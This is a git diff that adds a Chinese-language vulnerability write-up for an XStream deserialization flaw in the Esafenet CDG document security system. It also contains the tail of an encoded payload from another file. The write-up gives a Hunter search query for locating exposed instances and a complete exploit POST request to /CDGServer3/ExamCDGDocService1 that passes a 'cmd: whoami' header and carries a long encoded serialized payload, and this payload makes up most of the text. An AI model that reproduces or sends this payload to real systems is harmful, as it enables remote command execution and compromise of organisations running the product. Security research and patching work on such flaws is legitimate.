NNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1704465383622-c8f765bb-0518-4755-814e-b6c6e33b4141.png](./img/8zi-BeBfAYPgtdrb/1704465383622-c8f765bb-0518-4755-814e-b6c6e33b4141-354783.png)
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lv0vpgq01k5gln5t>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..cdc5a90
--- /dev/null
+++ b/亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/dO2u_IB_Mn-UFxxN/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-304979.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/ExamCDGDocService1 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBG